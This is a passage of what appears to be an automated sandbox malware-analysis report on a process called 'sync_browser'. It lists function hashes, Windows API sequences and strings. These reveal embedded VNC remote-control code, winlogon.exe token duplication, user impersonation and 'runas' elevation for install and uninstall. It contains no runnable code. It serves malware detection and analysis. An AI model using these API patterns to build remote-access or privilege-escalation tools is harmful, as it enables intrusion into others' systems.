                                                                    • Opcode ID: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
                                                                    • Instruction ID: bb4ba1b64dbe5a8cddf66f233708363731fe92195687aee2e3d79af8eb4fcebd
                                                                    • Opcode Fuzzy Hash: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
                                                                    • Instruction Fuzzy Hash: 0211BF62B2CA96C2E612BF14B4001AAE365FB84745F880035E98E477ADDF3CE516C7A0
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                    • String ID: winlogon.exe
                                                                    • API String ID: 1789362936-961692650
                                                                    • Opcode ID: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
                                                                    • Instruction ID: bd892899c32928db9829b93a53cd512b30a8de5f6d875671d4f5778772a320dd
                                                                    • Opcode Fuzzy Hash: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
                                                                    • Instruction Fuzzy Hash: 4311D03161CA46C5EB24BB25E8543A6A3A0FF88795FC44231D56E467A9EF3CF505C620
                                                                    APIs
                                                                    Strings
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - 1, xrefs: 00007FF74002C515
                                                                    • vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - Impersonationtoken exists, xrefs: 00007FF74002C557
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeaveRevertSelfTimetime
                                                                    • String ID: vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - Impersonationtoken exists
                                                                    • API String ID: 4293870407-1873781047
                                                                    • Opcode ID: be91d13ce7b9590cac12ce48197b4f720c3c90b62c69517ca8b832bb9a46fa5f
                                                                    • Instruction ID: 9fa26d002bb7cd95b122a92d1615f855970e002cb56ec85a5c0ec86313019eeb
                                                                    • Opcode Fuzzy Hash: be91d13ce7b9590cac12ce48197b4f720c3c90b62c69517ca8b832bb9a46fa5f
                                                                    • Instruction Fuzzy Hash: 83119A90E2CA82C5EB14BB74A4483A8A792AF48B88F880035D60D463A9CF3CF095C760
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -rebootforce$p$runas
                                                                    • API String ID: 3648085421-45594291
                                                                    • Opcode ID: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
                                                                    • Instruction ID: ef64b9794d6c14f19a6cfe3b49c081882b2a3fc3c2cf910271a63d44a9df9f07
                                                                    • Opcode Fuzzy Hash: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
                                                                    • Instruction Fuzzy Hash: 5B01A93561DB85C5E621AF50F49439AB3A4FB89744F900136E6CD02B68DF3CE154CB50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -install$p$runas
                                                                    • API String ID: 3648085421-1683557327
                                                                    • Opcode ID: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
                                                                    • Instruction ID: e589c9c8d222ea914d832eee19543424ebf9a484bcc900c4786748a05ab18d68
                                                                    • Opcode Fuzzy Hash: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
                                                                    • Instruction Fuzzy Hash: 0001DA3561CB81C5E760AF10F49439AB3A4FB89748F900236E6DD02B68DF7DE114CB50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -uninstall$p$runas
                                                                    • API String ID: 3648085421-3602422011
                                                                    • Opcode ID: 5574e6ddee382544abc3d2c84dae34c608b18e4d42992b9071503c0150b71b53
                                                                    • Instruction ID: db82da42d02cdb4ce1f99226f9ce0abb69900ff27d7ac39074d0b9466a57b5e6
                                                                    • Opcode Fuzzy Hash: 5574e6ddee382544abc3d2c84dae34c608b18e4d42992b9071503c0150b71b53
                                                                    • Instruction Fuzzy Hash: 8701C83561CB81C5E760AB10F49439AB3A4FB89748F900236E6CD02B69DF7DE114CB50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -securityeditor$p$runas
                                                                    • API String ID: 3648085421-1380712588
                                                                    • Opcode ID: 6428cee7919a180ae7089cf50127ee33227a6254b4296794cfa51c588de506a2
                                                                    • Instruction ID: 682997e1d8b12b4a4d261f6e54bd852daa8b2607e26f4277ae0617cf9a642d65
                                                                    • Opcode Fuzzy Hash: 6428cee7919a180ae7089cf50127ee33227a6254b4296794cfa51c588de506a2
                                                                    • Instruction Fuzzy Hash: 2001DA3561DB81C5E760AF10F49439AB3A4FB89748F900236E6CD02B68DF7DE114CB50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: freemalloc
                                                                    • String ID: vncencoder.cpp : failed to obtain colour map data!$vncencoder.cpp : generating 8-bit palette data$vncencoder.cpp : generating BGR233 palette data$vncencoder.cpp : remote palette data requested
                                                                    • API String ID: 3061335427-2748099863
                                                                    • Opcode ID: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
                                                                    • Instruction ID: 1090b05abc585b8dddef4b78906555dc059832044590066e4ad11e6d8b72a557
                                                                    • Opcode Fuzzy Hash: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
                                                                    • Instruction Fuzzy Hash: 9541D2A2A1C696C2F725BB20A5113B9F7A0EB44748F840032EA4D47BAEDF3CF505C760
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Thread$CreateFileMessageModuleNamePlayPostResumeSound
                                                                    • String ID:
                                                                    • API String ID: 3945334538-0
                                                                    • Opcode ID: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
                                                                    • Instruction ID: 1be5d58431d7e3c47582b595e7f95ac598a74280491c58b9ab530ecf217c3106
                                                                    • Opcode Fuzzy Hash: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
                                                                    • Instruction Fuzzy Hash: 8041B126A1C941C2EB50BF29F400269A361EBC8B98F854131DE5D077BDDE3CE481C360
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo$_fileno_ftbuf
                                                                    • String ID:
                                                                    • API String ID: 2434734397-0
                                                                    • Opcode ID: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
                                                                    • Instruction ID: 06bed2f9d12774a5de69ca3f246d0c46c41384fe6696c0d006f232856dbf5054
                                                                    • Opcode Fuzzy Hash: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
                                                                    • Instruction Fuzzy Hash: B6312B51E1C647C1EE58B7A5585077D92A2AF427A0FD05631DD2D473FADF2CF841C220
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$EnterErrorExceptionLastObjectRaiseSingleValueWait
                                                                    • String ID:
                                                                    • API String ID: 824239979-0
                                                                    • Opcode ID: 12bf6ecd7088038fd47cecf56f3922a6986b1dec9d24cf819874f6182f192e8f
                                                                    • Instruction ID: 0161ae20d1ef7b6d529cb075eb37cef683d32919b00ab59ae5da1c090fc9c1af
                                                                    • Opcode Fuzzy Hash: 12bf6ecd7088038fd47cecf56f3922a6986b1dec9d24cf819874f6182f192e8f
                                                                    • Instruction Fuzzy Hash: 7C216F32A2DA42C2EB45BF20E444569A3A0FF84784F845131EA5E02B69DF3CF845C760
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleToken$OpenProcess$CreateDuplicateFirstInformationProcess32SnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 3355884492-0
                                                                    • Opcode ID: 6104325d5a1b9d43be635a96be43e70745f11669b1d82cc91958b0e9663c2412
                                                                    • Instruction ID: 7cf846b8161ea090a15a249553c8b9dab55c40e1eda53baecfb8311347fedb52
                                                                    • Opcode Fuzzy Hash: 6104325d5a1b9d43be635a96be43e70745f11669b1d82cc91958b0e9663c2412
                                                                    • Instruction Fuzzy Hash: AD218D25B0C682C2E710BB25B444269E760BFC87D0F844034DA6D47BAADF7DE445CB61
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_fileno_flush_freebuf_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3613856401-0
                                                                    • Opcode ID: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
                                                                    • Instruction ID: 3ee75f7b4ac066e885a4c00b9449c5dbe494d32b4bdec3366e36673abd4086f0
                                                                    • Opcode Fuzzy Hash: 22e8c468e637d92c8e7f14c6622d0db4cac7223b0f4977f25baec7dc4bd546e1
                                                                    • Instruction Fuzzy Hash: CD014F12E1C542C1FA587AF5984237995609F95764FA94230EA29463FBCEBCF84183A1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteObjectfree$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 2426525106-0
                                                                    • Opcode ID: 9faadf5584e3ab048ad9f99b225c95f2b16b16b17d63f249fe3ec8bb2152293a
                                                                    • Instruction ID: f5ea0d2d64a52202325b26dcbd4ae63310cdde25191d667a4e570d58d1f76e1a
                                                                    • Opcode Fuzzy Hash: 9faadf5584e3ab048ad9f99b225c95f2b16b16b17d63f249fe3ec8bb2152293a
                                                                    • Instruction Fuzzy Hash: 0D01C26271CA41D6DA54FB66E991578B334FF88B80B844031DB5D43B75CF29F4A5C320
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
